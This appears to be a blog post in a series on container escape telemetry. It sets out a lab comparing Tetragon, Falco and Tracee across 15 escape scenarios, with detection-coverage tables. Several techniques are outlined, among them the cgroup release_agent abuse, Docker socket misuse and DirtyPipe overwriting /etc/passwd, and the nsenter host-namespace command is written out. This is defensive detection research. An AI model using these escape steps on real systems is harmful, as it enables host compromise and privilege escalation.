Container Escape Telemetry, Part 2: Methodology and Tool Architecture
The lab setup, scenario matrix, and tool comparison framework behind the container escape telemetry research. Three eBPF tools, 15 scenarios, one tool per VM, and a PowerShell harness that ties it all together.
This is Part 2 of the container escape telemetry series (overview). Part 1 covered the isolation primitives and eBPF observability model. This post covers the lab architecture, the three tools under test, the 15 escape scenarios, and the detection coverage matrix. If you want to skip straight to what the telemetry actually looks like, jump to Part 3: Per-Scenario Deep Dives.
The Lab
Each tool ran on its own dedicated Hyper-V VM: 3 GB RAM, 2 vCPUs, Ubuntu 22.04 on kernel 5.15.0-91-generic. One tool per VM. This was non-negotiable. eBPF programs from different tools will contend for the same kernel hooks, and if you’re trying to measure event ordering and timing, that contention corrupts your data. You can’t draw conclusions about “tool A generated event X before tool B generated event Y” if both tools are fighting over the same kprobe attachment points on the same kernel.
You might notice this entire setup runs on Windows with PowerShell and Hyper-V rather than a more typical Linux-native approach. The reason is mundane: my gaming PC has 48 GB of RAM, and computers are way too expensive these days to justify a dedicated lab machine. So Vagrant + Hyper-V it is.
Automation
A PowerShell harness (run.ps1) automated the full workflow per VM: reload the VM to apply kernel parameters, upload scenario scripts via SCP, install the assigned tool, execute all 15 scenarios through a bash harness that records start/end timestamps as JSONL markers, then download results. Those markers are what let me correlate tool events to specific scenario windows with precision. Each scenario runs between a MARKER-S{N}-START and MARKER-S{N}-END container, and every tool captures these container lifecycle events, giving me exact time boundaries to slice the telemetry.
The automation matters for reproducibility. Every run follows the same sequence, with the same sleep intervals, on a freshly reloaded VM. If I need to change a tool’s configuration and re-run, the harness guarantees the same scenario execution order and timing.
Why This Kernel
Kernel 5.15.0-91-generic was chosen deliberately, not by default. Several constraints intersected:
- cgroup v1 is required for S01 and S02 (cgroup release_agent escapes). The VMs boot with
systemd.unified_cgroup_hierarchy=0to force cgroup v1. - CVE-2022-0492 (S02) is patched on this kernel – the unprivileged unshare-to-cgroup exploit path fails with EACCES. That’s intentional: S02 tests the CVE path, observes the failure, then falls back to a privileged
release_agentescape. The failed attempt still generates telemetry (the EACCES return), and the fallback still succeeds because the container is privileged and cgroup v1 is available. - CVE-2022-0847 DirtyPipe (S08) requires a kernel in the 5.8-5.16.10 range to actually exploit. Kernel 5.15.0-91 is in that window, so S08 produces a real exploit – splice() actually corrupts the page cache and overwrites /etc/passwd. On a patched kernel, you’d still see the syscall pattern but not the actual escape. That real exploit is one of the most compelling data points in the whole series.
- CVE-2022-0185 (S09) and CVE-2021-22555 (S10) are already patched on this kernel, so those run in PATTERN mode – the syscall sequence fires but the kernel rejects the exploit. That’s fine for telemetry analysis. The tool still sees every syscall; it just doesn’t result in privilege escalation.
A newer 6.x kernel would sacrifice the real DirtyPipe exploit. I strived for true emulation in this project – pattern-only scenarios are useful, but watching splice actually corrupt the page cache and overwrite /etc/passwd produces telemetry you can’t get any other way.
The 15 Scenarios
The scenarios break into five categories. Each scenario is a self-contained shell script that creates its own container, runs the technique, checks for success, and cleans up. Result states: ESCAPED (technique worked), PATTERN (syscall sequence fired on a patched kernel), BLOCKED (kernel or runtime prevented the technique), ABUSED (dangerous capabilities exercised without crossing a namespace boundary), or TELEMETRY_TEST (stress test measuring tool reliability).
Misconfiguration-Based Escapes (S01-S05)
These work on any kernel version because they exploit configuration mistakes, not kernel vulnerabilities.
| ID | Technique | Result | What Happened |
|---|---|---|---|
| S01 | cgroup release_agent | ESCAPED | Mounted cgroupfs v1, wrote release_agent, triggered host code execution |
| S02 | CVE-2022-0492 + fallback | ESCAPED | unshare to user/cgroup ns failed (patched), privileged fallback succeeded |
| S03 | nsenter –pid=host | ESCAPED | nsenter -t 1 -m -u -i -p joined all host namespaces |
| S04 | Docker socket mount | ESCAPED | Used mounted docker.sock to spawn container with host root filesystem |
| S05 | Host /proc access | ESCAPED | Read /proc/1/root, core_pattern, mountinfo, environ from privileged container |
S01 is the classic. Mount the cgroup filesystem, create a child cgroup, write to notify_on_release and release_agent, trigger it by writing to cgroup.procs. The host kernel executes your payload. S02 tries the same thing through the CVE-2022-0492 path first (unshare into new user + cgroup namespaces), fails because the kernel is patched, then falls back to the privileged container path. S03 is the simplest: nsenter -t 1 -m -u -i -p joins the host’s namespaces directly. S04 mounts the Docker socket and uses it to spawn a new container with the host filesystem. S05 reads sensitive files through the host’s /proc filesystem that a privileged container can access.
All five succeed. All five generate distinct telemetry signatures. The value of having all five is that they exercise different kernel mechanisms (mount, setns, socket_connect, file_open) and produce different event patterns across the three tools.
Baseline Control (S06)
| ID | Technique | Result | What Happened |
|---|---|---|---|
| S06 | Unprivileged container | NO ESCAPE | mount and unshare denied, no escape signals |
S06 runs a standard unprivileged container that performs normal operations: file reads, process spawning, network lookups. No escape attempt. This is the noise floor. Tetragon generated 1,127 events from its policy hooks, Falco generated 76, Tracee generated 29. Anything a real escape generates needs to be distinguishable from this baseline.
CVE-Based Exploits (S07-S12)
These generate the exploit syscall patterns. Some actually exploit the vulnerability (S08), some fire the pattern on a patched kernel (S09, S10), and some are blocked by the runtime (S11, S12).
| ID | CVE | Result | What Happened |
|---|---|---|---|
| S07 | CVE-2024-21626 (Leaky Vessels) | PATTERN | runc 1.1.11 WORKDIR /proc/self/fd/7; fd leak didn’t manifest in this environment |
| S08 | CVE-2022-0847 (DirtyPipe) | EXPLOITED | Real exploit: splice() overwrote /etc/passwd via page cache corruption |
| S09 | CVE-2022-0185 (fsconfig) | PATTERN | unshare(CLONE_NEWUSER), fsopen(“ext4”), fsconfig(). Kernel patched. |
| S10 | CVE-2021-22555 (Netfilter) | PATTERN | unshare(USER|NET), NETLINK_NETFILTER socket, raw socket creation |
| S11 | CVE-2025-31133 (maskedPaths) | BLOCKED | Symlinks to /proc/sysrq-trigger and core_pattern; writes blocked by read-only /proc |
| S12 | CVE-2019-5736 (runc overwrite) | BLOCKED | /proc/self/exe write returned ETXTBSY. Patched runc prevented overwrite. |
S07 and S12 use a helper script to swap in vulnerable runc versions (1.1.11 and 1.0.0-rc2) for the duration of the scenario, then restore the patched version afterward. S07’s fd leak didn’t manifest in our Docker/containerd version – the leaked file descriptor existed but pointed to a non-exploitable target – so the syscall pattern fires but the escape doesn’t complete. S08 is the standout: a real DirtyPipe exploit that corrupts the page cache via splice() and overwrites /etc/passwd with a root entry. The telemetry difference between “pattern on patched kernel” and “actual exploitation” turns out to matter a lot, and I’ll dig into that in Part 3.
Capability Abuse (S13-S14)
These came from reviewer feedback: “I would have loved if one of your scenarios was taking a privileged container that isn’t a straight break out.” Fair point. Not every dangerous container action crosses a namespace boundary. Sometimes the damage happens entirely within the container’s existing privileges.
| ID | Technique | Result | What Happened |
|---|---|---|---|
| S13 | --privileged post-exploit |
ABUSED | Mounted host block device, loaded kernel module, read /dev/kmsg, enumerated keyrings, accessed BPF subsystem |
| S14 | Excessive capabilities | ABUSED | Read /proc/1/environ and /proc/1/maps via CAP_SYS_PTRACE+–pid=host, raw sockets via CAP_NET_RAW, mounts via CAP_SYS_ADMIN |
S13 is the “someone ran --privileged because their eBPF tool told them to” scenario. The container gets all capabilities, all devices, no seccomp, no AppArmor. It doesn’t try to escape – it doesn’t need to. It mounts the host’s block device, loads a kernel module, reads the kernel log buffer, enumerates keyrings (which are not namespace-aware, so any container can read the root keyring), and loads an eBPF program. S14 is the subtler case: specific dangerous capabilities (CAP_SYS_PTRACE, CAP_NET_RAW, CAP_SYS_ADMIN) without full --privileged. Teams try to be granular but still over-grant.
The key question these answer: if something has dangerous privileges and isn’t doing a textbook namespace escape, do these tools even notice?
Stress Test (S15)
| ID | Technique | Result | What Happened |
|---|---|---|---|
| S15 | Syscall flood + concurrent escape | TELEMETRY_TEST | 7-phase flood measuring ring buffer resilience under adversarial load |
S15 answers the question from Part 1: can an attacker actually blind a security tool by flooding syscalls? Seven phases in two groups. Phases 1-3 flood getpid() at 1K, 100K, and 1M calls (unhooked – no tool generates events). Phases 4-5 and 7 flood openat(/dev/null) at 100K, 1M, and 10M calls (hooked – generates real ring buffer pressure). Phase 6 is the critical test: 1M openat flood running concurrently with an nsenter -t 1 -m -u -i -p escape. Can the tool see the escape during the flood?
The results were the most operationally significant finding in the research. I’ll cover them in detail in Part 4.
The Three Tools
Before diving into what each tool captured, it’s worth understanding why they produce such different telemetry from the same kernel events. The differences aren’t random. They flow directly from how each tool is architected.
Tetragon
Tetragon defines custom eBPF kprobes via TracingPolicy CRDs. For this research, I wrote 8 policies covering 31 kernel function hooks. The critical design choice is that filtering happens in the kernel: if an event doesn’t match a TracingPolicy, it never enters the ring buffer. Never reaches userspace. Never consumes buffer space.
Every event carries the full 10-namespace inode set with a host/container boolean, uid/gid/euid/egid/suid/sgid/fsuid/fsgid, complete permitted and effective capability sets (every capability listed by name), and full process ancestry up to the configured depth. A single Tetragon event averages ~14,600 bytes. That’s not bloat – it’s forensic self-sufficiency. Every event can be analyzed in complete isolation without correlating against external context.
The tradeoff is authoring cost. Tetragon ships with zero escape-detection policies. The TracingPolicy CRD system is powerful but empty. You’re writing kprobe YAML from scratch, specifying which kernel functions to hook, which arguments to capture, and which filters to apply. That authoring cost is real. But it means every event you get back is exactly the kernel function call you asked for, with the exact arguments you specified.
Falco
Falco takes the opposite approach to coverage. It ships with 400+ community-maintained rules and its eBPF driver captures syscalls broadly, sending events to userspace where the Falco engine evaluates YAML rule conditions. Only rule-matched events are emitted as output. This means the barrier to getting started is low – install Falco, and you immediately have detection coverage for common container escape patterns.
Events carry container name, image, and ID via the container runtime socket, user info, and process ancestry up to a configurable depth. Each event averages ~3,500 bytes. Falco doesn’t provide raw namespace inodes, which limits certain types of forensic correlation. You know a namespace change happened, but you can’t programmatically prove which specific namespace transitioned by comparing inode values.
One important caveat: Falco’s default ruleset detected only 5 of 13 scoreable scenarios (S01-S14, excluding S06 baseline and S15 stress test). I wrote twelve additional custom rules targeting CVE-specific syscalls and capability abuse patterns, and enabled rule_matching=all so overlapping rules fire on the same event. The gaps were entirely configuration-driven, not engine limitations. I’ll cover this in detail in a later post, because it’s one of the most actionable findings from the research.
Tracee
Tracee sits in an interesting middle ground. It attaches eBPF tracepoints to 330+ syscalls and runs a behavioral signature engine (the TRC-* signatures) on top. This gives it two telemetry layers: raw syscall capture and derived behavioral events. Each event averages ~1,400 bytes – the most compact of the three tools.
Its standout capabilities are magic_write and commit_creds. magic_write fires when file content changes through a mechanism that bypasses normal write permissions – which is exactly what page cache corruption does. commit_creds captures the actual kernel credential struct transition, showing old and new uid/gid/capability sets. These are synthesized observations, not raw syscalls. They detect exploit consequences rather than specific syscall sequences, which makes them more resilient to exploit variations. If the next kernel CVE uses a completely different syscall chain to corrupt page cache or escalate credentials, magic_write and commit_creds will still fire. A tool that only matches specific syscall patterns won’t.
The tradeoff is that Tracee’s broad hook coverage creates a larger attack surface for ring buffer flooding. With 30 event types in our policy (and 330+ in its default set), an attacker has many possible syscalls to flood. This is manageable with proper policy tuning – particularly path-filtering security_file_open – but it requires understanding which events are high-frequency and scoping them appropriately. I’ll cover the S15 stress test results and what they mean for Tracee deployments in Part 4.
Architecture Comparison
| Dimension | Tetragon | Falco | Tracee |
|---|---|---|---|
| Collection method | Custom kprobes via TracingPolicy | eBPF syscall driver + rule engine | eBPF tracepoints + behavioral signatures |
| Where filtering happens | In-kernel BPF | Userspace rule engine | In-kernel + userspace behavioral |
| Namespace context | Full 10-ns inode set + is_host | Container name/image/id, no raw inodes | mountNs + pidNs inodes, container metadata |
| Credential detail | Full uid/gid/euid + capability sets | user.uid, cap_effective, cap_permitted | userId, commit_creds old/new structs |
| Process ancestry | Full tree with binary paths + args | proc.aname[N] up to configurable depth | hostParentProcessId chain, parentEntityId |
| Enforcement | In-kernel SIGKILL or syscall return override | Alert only | Alert only |
| Avg event size | ~14,600 bytes | ~3,500 bytes | ~1,400 bytes |
| Default detection coverage | None (author your own policies) | 400+ community rules | 330+ syscall hooks + TRC-* behavioral sigs |
The “where filtering happens” row is the single most important architectural distinction for understanding the tools’ behavior under load. Tetragon’s in-kernel filtering means irrelevant events never consume buffer space. Falco’s userspace filtering means all syscalls hit the buffer, but the rule engine decides what to emit. Tracee’s model is somewhere between: its eBPF programs do per-event-type filtering in-kernel, but event-type prioritization under buffer pressure is not implemented. That distinction drives the S15 results.
Detection Coverage
The table below shows which tools generated escape-specific telemetry for each scenario. I’m not counting generic process lifecycle events – only signals that actually indicate the escape technique was used. The Falco column reflects the final state after my twelve custom rule additions. S15 is a stress test, not an escape scenario, so it’s scored separately.
Legend: ✓ = detected the escape technique, ✗ = missed, △ = partial detection (tool saw related activity but not the core escape mechanism – counts as detected in scoring since it would trigger investigation).
| Scenario | Technique | Tetragon | Falco | Tracee |
|---|---|---|---|---|
| S01 | cgroup release_agent | ✓ mount + cgroup_mkdir + file_open | ✓ release_agent write | ✓ mount + magic_write |
| S02 | CVE-2022-0492 + fallback | ✓ unshare + mount + task_alloc | ✓ release_agent + ns change | ✓ switch_task_ns + magic_write |
| S03 | nsenter | ✓ setns() x4 with ns type flags | ✓ Namespace Change x5 + Nsenter Execution | ✓ setns x4 + switch_task_ns x4 |
| S04 | Docker socket | ✓ socket_connect to docker.sock | △ Docker Socket Access (runc init only) | ✓ security_socket_connect x5 |
| S05 | Host /proc | ✓ file_open on /proc/1/root/*, core_pattern | ✓ Sensitive Host File Read x3 | ✓ security_file_open |
| S07 | Leaky Vessels | ✗ No fd-leak hook | ✗ No fd-leak rule | ✗ No fd-leak signature |
| S08 | DirtyPipe | ✓ splice/do_splice with file paths | ✓ splice (custom rule) | ✓ splice + 961 magic_write |
| S09 | fsconfig | ✓ fsopen + fsconfig + cap_capable | ✓ fsconfig (custom rule) | ✓ unshare + commit_creds |
| S10 | Netfilter | ✓ setsockopt + unshare | ✓ netlink socket (custom rule) | ✓ unshare + commit_creds + setsockopt |
| S11 | maskedPaths | ✓ symlink() x2 to /proc targets | ✓ symlink (custom rule) | ✓ symlink x2 |
| S12 | runc overwrite | ✓ bprm_check + file_open /proc/self/exe | ✗ Write blocked before observation | △* openat(/proc/self/exe) ret=ETXTBSY |
| S13 | Privileged post-exploit | ✓ mount + keyctl + security_file_open | ✓ Keyctl + Kernel Log + Mount + Raw Socket | ✓ mount + security_file_open + keyctl + commit_creds |
| S14 | Excessive capabilities | ✓ mount + keyctl + security_file_open | ✓ Host Environ + Host Maps + Mount + Packet socket | ✓ security_file_open + mount + tcpdump exec |
*△* for Tracee S12 requires the openat event to be explicitly enabled in the policy; it is not in Tracee’s default event set.
Detection Scores (S01-S14 escape scenarios only; S15 is a stress test; △ counts as detected, △* does not in the base score):
| Tool | Real-Time Detection |
|---|---|
| Tetragon | 12/13 |
| Tracee | 11/13 (12/13 with openat event enabled) |
| Falco | 11/13 (5/13 before custom rules) |
What the Scores Don’t Tell You
The aggregate scores are useful for a quick comparison, but they flatten out qualitative differences that matter enormously in practice. A checkmark in the detection column doesn’t tell you:
-
What context the event carries. Tetragon’s
setns()events include before/after namespace inode pairs with type flags decoded. Falco’s “Namespace Change” alert tells you it happened but not which namespaces transitioned. Both get a checkmark, but one gives you forensic evidence and the other gives you a detection. -
Whether the detection required custom work. Falco’s 11/13 includes 6 scenarios that only work because I wrote custom rules (the other 5 use default rules). Tetragon ships with zero escape-detection policies, so all 12 detections required custom TracingPolicies. Tracee’s 11/13 includes behavioral signatures that ship by default. The out-of-box experience is very different.
-
How the tool handles the scenario it missed. All three tools miss S07 (Leaky Vessels). But the reason is the same for all of them: the fd-leak attack doesn’t produce a distinctive syscall pattern that can be hooked. The WORKDIR during
docker buildjust looks like a normal process with an unusual working directory. This is a fundamentally hard detection problem, not a tool limitation.
The S06 baseline is important context for everything that follows. It shows what “normal” telemetry looks like from an unprivileged container where mount and unshare are both denied. Tetragon generated 1,127 events from its policy hooks with zero escape-specific signals. This is the noise floor against which everything else should be compared. If your detection can’t distinguish escape activity from that baseline, it’s not a useful detection.
What Comes Next
With the lab, tools, and coverage matrix established, Part 3 digs into the per-scenario telemetry: what each tool actually captured, what the events look like, and what patterns emerge when you compare the raw data across tools. That’s where the qualitative differences behind the checkmarks become concrete.
If you’re more interested in operational questions – how much data do these tools generate, what does the signal-to-noise look like, and which tool should you actually deploy – skip to Part 4.
The full scenario scripts, Tetragon policies, Falco rules, and automation harness are available in the research repository.
References
CVEs and Vulnerability Research
- S01 – cgroup release_agent: Felix Wilhelm’s original PoC (2019); Trail of Bits writeup
- S02 – CVE-2022-0492: Palo Alto Unit 42 analysis; kernel patch commit
- S07 – CVE-2024-21626 (Leaky Vessels): Snyk disclosure and analysis; runc security advisory
- S08 – CVE-2022-0847 (DirtyPipe): Max Kellermann’s original writeup; kernel patch commit
- S09 – CVE-2022-0185 (fsconfig heap overflow): Crusaders of Rust writeup; kernel patch commit
- S10 – CVE-2021-22555 (Netfilter OOB write): Andy Nguyen’s writeup; kernel patch commit
- S11 – CVE-2025-31133 (maskedPaths symlink race): Moby security advisory
- S12 – CVE-2019-5736 (runc /proc/self/exe overwrite): Aleksa Sarai’s original disclosure; runc patch PR
Tool Documentation
- Tetragon: TracingPolicy reference; GitHub repository
- Falco: Rules documentation; Default ruleset; GitHub repository
- Tracee: Events documentation; Behavioral signatures; GitHub repository
Kernel Documentation
- cgroup v1 release_agent – kernel documentation for cgroup notification mechanism
- namespaces(7) – overview of Linux namespaces
- capabilities(7) – Linux capability model
- BPF ring buffer – kernel documentation for the eBPF ring buffer used by Tetragon and Tracee
